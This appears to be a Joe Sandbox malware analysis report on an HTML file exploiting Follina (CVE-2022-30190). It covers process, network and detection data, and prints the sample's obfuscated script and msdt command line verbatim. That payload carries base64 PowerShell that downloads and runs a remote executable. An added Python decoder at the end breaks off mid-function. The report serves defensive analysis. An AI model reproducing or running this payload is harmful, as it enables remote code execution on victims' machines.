Windows
Analysis Report
1024203777.test.html
Overview
General Information
Detection
Score: | 56 (range 0 - 100) |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 5312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- chrome.exe (PID: 5676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1824,i,13757677598881729272,15879241280713586661,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- msdt.exe (PID: 5472 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
- chrome.exe (PID: 6104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html" MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- cleanup
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
| JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Signatures (number of matching entries in parentheses)
AV Detection
- Virustotal (1)
Exploits
- File source (2)
Further signatures, in report order
- Directory created (1)
- IP Address (1)
- DNS traffic detected (1)
- Network traffic detected (10)
- HTTP traffic detected (2)
- Virustotal (1)
- File created (1)
- Key opened (1)
- Classification label (1)
- Process created (39)
- File created (1)
- Automated click (17)
- File opened (1)
- Window detected (1)
- Directory created (1)
- String (2)
- Window / User API (1)
- Process created (2)
MITRE ATT&CK techniques with signature hits (hit count in parentheses; the matrix's unmatched placeholder cells are omitted)
- Execution: Command and Scripting Interpreter (1); Scripting (1)
- Privilege Escalation: Process Injection (1)
- Defense Evasion: Masquerading (2); Process Injection (1); Scripting (1)
- Discovery: Application Window Discovery (1); System Information Discovery (1)
- Command and Control: Encrypted Channel (1); Data Encoding (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Ingress Tool Transfer (1)
Scanner | Detection
---|---
ReversingLabs | 5%
Virustotal | 10%
Name | IP | Active | Malicious | Reputation
---|---|---|---|---
accounts.google.com | 216.58.215.237 | true | false | high
www.google.com | 172.217.168.36 | true | false | high
clients.l.google.com | 172.217.168.78 | true | false | high
clients2.google.com | unknown | unknown | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
---|---|---|---|---|---
216.58.215.237 | accounts.google.com | United States | 15169 | GOOGLEUS | false
172.217.168.78 | clients.l.google.com | United States | 15169 | GOOGLEUS | false
172.217.168.36 | www.google.com | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
IP |
---|
192.168.2.1 |
192.168.2.23 |
127.0.0.1 |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 696527 |
Start date and time: | 2022-09-02 13:36:20 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 31s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 1024203777.test.html |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 27 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal56.expl.winHTML@39/0@4/7 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.153.199, 142.250.203.106, 172.217.168.67
- Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r3---sn-4g5edn6k.gvt1.com, r5---sn-4g5ednsz.gvt1.com, arc.msn.com, r3---sn-4g5edns6.gvt1.com, r2---sn-4g5edn6r.gvt1.com, r2.sn-4g5edn6r.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, optimizationguide-pa.googleapis.com
- Not all processes were analyzed, report is missing behavior information
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtWriteVirtualMemory calls found.
File type: | |
Entropy (8bit): | 6.048046902595105 |
TrID: | |
File name: | 1024203777.test.html |
File size: | 19364 |
MD5: | c389f7ee1d9e6376b7d96e80d7a1ffe1 |
SHA1: | 2d0b931cf7cecddddb35457a5719353840f8ca66 |
SHA256: | 8a01945c5951b6685768c155d938e7805b097477fcbb7e815fcb1cc26f1170da |
SHA512: | 7de15cf2ed560a6ff7e7fd5d3c8b0e4f13ca585bab09d40e89785fc12f5b4c79d9f4cec4034b3f40f4ca54abab100e27947867558dbc7876366a8b614eea0ffc |
SSDEEP: | 384:hZJbWuYvXebbmk2RFGqL1vXipiIPq2L15j+h5i4rXgrE/M1eEScjy:hZJCXAbmDRFJ16pti2Lvaxb2rlW |
TLSH: | C092C0E9EECC15EB09D1E230F66438DC05A60D4B117A21914CAF3EAD8FCD7535C1A6B1 |
File Content Preview: | <!docTYpe HTML>....<hTml>....<bODy>....<sCriPT LanGuagE="jSCript">....//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo |
Icon Hash: | 78d0a8cccc88c460 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 13:37:24.915282011 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:24.915332079 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:24.915498972 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:24.924937963 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.924977064 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:24.925056934 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.927174091 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:24.927206993 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:24.946683884 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.946722031 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:24.946855068 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.948600054 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.948622942 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:24.949013948 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.949033976 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:24.986951113 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:25.009305000 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.011080027 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.041279078 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:25.041321993 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:25.041929960 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.041959047 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.042216063 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.042241096 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.042694092 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.042783022 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.042821884 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.042890072 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.043325901 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:25.043339968 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:25.043397903 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:25.046626091 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.046747923 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.046799898 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.046868086 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.163743019 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.188330889 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.188591957 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.188762903 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.188791990 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.189939976 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.190104961 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.190227985 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.190248013 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.190496922 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.190658092 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.221560001 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.221662998 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.221697092 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.221721888 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.221776962 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.230128050 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.230158091 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.247797966 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.247860909 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.247884035 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.247904062 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.247961998 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.266376019 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.266402960 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.366204977 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.366235971 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.465065002 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:28.156482935 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.156534910 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.156655073 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.157052994 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.157066107 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.212338924 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.214014053 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.214044094 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.215162039 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.215795994 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.247773886 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.247946978 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.383994102 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.384033918 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.570386887 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:38.238847971 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:38.238976955 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:38.239082098 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:38.762368917 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:38.762418985 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:11.519614935 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:38:11.519629955 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:38:28.212451935 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:38:28.212832928 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.212892056 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:28.212997913 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.213148117 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:38:28.213227034 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.213227034 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:38:28.213243008 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:28.265316963 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:28.311297894 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.321794033 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.321815014 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:28.322848082 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:28.323334932 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.323546886 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 13:37:24.670469999 CEST | 52955 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 13:37:24.671158075 CEST | 60582 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 13:37:24.687956095 CEST | 53 | 52955 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 13:37:24.698611975 CEST | 53 | 60582 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 13:37:28.119664907 CEST | 65320 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 13:37:28.150039911 CEST | 53 | 65320 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 13:38:28.191190004 CEST | 58119 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 13:38:28.211313963 CEST | 53 | 58119 | 8.8.8.8 | 192.168.2.3 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
---|---|---|---|---|---|---|---
Sep 2, 2022 13:37:24.670469999 CEST | 192.168.2.3 | 8.8.8.8 | 0x7c79 | Standard query (0) | | A (IP address) | IN (0x0001)
Sep 2, 2022 13:37:24.671158075 CEST | 192.168.2.3 | 8.8.8.8 | 0x4d5c | Standard query (0) | | A (IP address) | IN (0x0001)
Sep 2, 2022 13:37:28.119664907 CEST | 192.168.2.3 | 8.8.8.8 | 0x287d | Standard query (0) | | A (IP address) | IN (0x0001)
Sep 2, 2022 13:38:28.191190004 CEST | 192.168.2.3 | 8.8.8.8 | 0xc090 | Standard query (0) | | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
---|---|---|---|---|---|---|---|---|---
Sep 2, 2022 13:37:24.687956095 CEST | 8.8.8.8 | 192.168.2.3 | 0x7c79 | No error (0) | | | 216.58.215.237 | A (IP address) | IN (0x0001)
Sep 2, 2022 13:37:24.698611975 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d5c | No error (0) | | clients.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Sep 2, 2022 13:37:24.698611975 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d5c | No error (0) | | | 172.217.168.78 | A (IP address) | IN (0x0001)
Sep 2, 2022 13:37:28.150039911 CEST | 8.8.8.8 | 192.168.2.3 | 0x287d | No error (0) | | | 172.217.168.36 | A (IP address) | IN (0x0001)
Sep 2, 2022 13:38:28.211313963 CEST | 8.8.8.8 | 192.168.2.3 | 0xc090 | No error (0) | | | 172.217.168.36 | A (IP address) | IN (0x0001)
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49721 | 172.217.168.78 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 11:37:26 UTC | 0 | OUT | |
2022-09-02 11:37:26 UTC | 1 | IN | |
2022-09-02 11:37:26 UTC | 2 | IN | |
2022-09-02 11:37:26 UTC | 2 | IN | |
2022-09-02 11:37:26 UTC | 3 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.3 | 49719 | 216.58.215.237 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 11:37:26 UTC | 0 | OUT | |
2022-09-02 11:37:26 UTC | 1 | OUT | |
2022-09-02 11:37:26 UTC | 3 | IN | |
2022-09-02 11:37:26 UTC | 4 | IN | |
2022-09-02 11:37:26 UTC | 4 | IN |
Target ID: | 0 |
Start time: | 13:37:18 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 3 |
Start time: | 13:37:21 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 4 |
Start time: | 13:37:23 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 17 |
Start time: | 13:38:28 |
Start date: | 02/09/2022 |
Path: | C:\Windows\System32\msdt.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78dd30000 |
File size: | 1560576 bytes |
MD5 hash: | 8BE43BAF1F37DA5AB31A53CA1C07EE0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
Reputation: | moderate |
Script: the body of the sample's `<script language="jscript">` element. The ms-msdt: URL is assembled from dozens of short concatenated string literals (and the PowerShell inside it builds its own strings from character codes such as `[chAr]58` and `[cHAR]34`), so no single literal contains a matchable token like `ms-msdt:` or `FromBase64String(`. The assembled value is assigned to `location.href`, which hands it to the ms-msdt: protocol handler; that is what launches msdt.exe (PID 5472) with the URL as its argument, as shown in the process tree above.

```javascript
location.href = "MS-msd" + "t:/I" + "D" + " " + "P" + "CwdIAGnOST" + "i" + "c" + " " + "-s" + "kiP" + " " + "fO" + "rce" + " " + "-PAra" + "M" + " " + "\"" + "It_rEb" + "rOwsEF" + "orFI" + "LE=" + "#7qnxE3" + " " + "IT_LaunchMethod" + "=Cont" + "extMen" + "u" + " " + "IT_Browse" + "ForFile=" + "A" + "q" + "$(" + "iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbG" + "UoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV" + "4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEF" + "cQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyA" + "tZk" + "9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))')" + ")))Y" + "/../../." + "./../../.." + "/../../" + "../../" + "../" + ".EXE" + " " + "\"";
```
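The following decoder is an added example for this report, not code from Joe Sandbox or from the sample's author. It reassembles the `location.href` string from the script's concatenated fragments, pulls the base64 blob out of the `IT_BrowseForFile` parameter, decodes the PowerShell it hides, and extracts the indicators an analyst needs (download URL, dropped path, LOLBin invocation, processes the payload kills). Everything is done offline: the blob is treated as data and nothing executes the recovered PowerShell. `SAMPLE_JS` is the script line copied verbatim from the Script section; the regular expressions, thresholds (64-character base64 run) and field names of the returned dictionaries are my own choices, not anything the report or the sample defines.

```python
"""Offline decoder for the obfuscated ms-msdt: launcher in 1024203777.test.html.

Added example for this report, not code from Joe Sandbox or the sample's author.
It only parses and base64-decodes; nothing here executes the recovered PowerShell.
"""
import base64
import re
from urllib.parse import unquote

# The location.href assignment copied verbatim from the report's Script section.
SAMPLE_JS = r'''location.href = "MS-msd" + "t:/I" + "D" + " " + "P" + "CwdIAGnOST" + "i" + "c" + " " + "-s" + "kiP" + " " + "fO" + "rce" + " " + "-PAra" + "M" + " " + "\"" + "It_rEb" + "rOwsEF" + "orFI" + "LE=" + "#7qnxE3" + " " + "IT_LaunchMethod" + "=Cont" + "extMen" + "u" + " " + "IT_Browse" + "ForFile=" + "A" + "q" + "$(" + "iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbG" + "UoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV" + "4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEF" + "cQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyA" + "tZk" + "9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))')" + ")))Y" + "/../../." + "./../../.." + "/../../" + "../../" + "../" + ".EXE" + " " + "\"";'''

# A JavaScript double-quoted string literal, allowing backslash escapes such as \".
JS_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')


def join_js_fragments(js: str) -> str:
    """Rebuild the value the script assigns to location.href.

    The sample splits the URL into dozens of short literals joined with '+', so no
    single literal contains a token such as 'ms-msdt:'; joining them restores it.
    """
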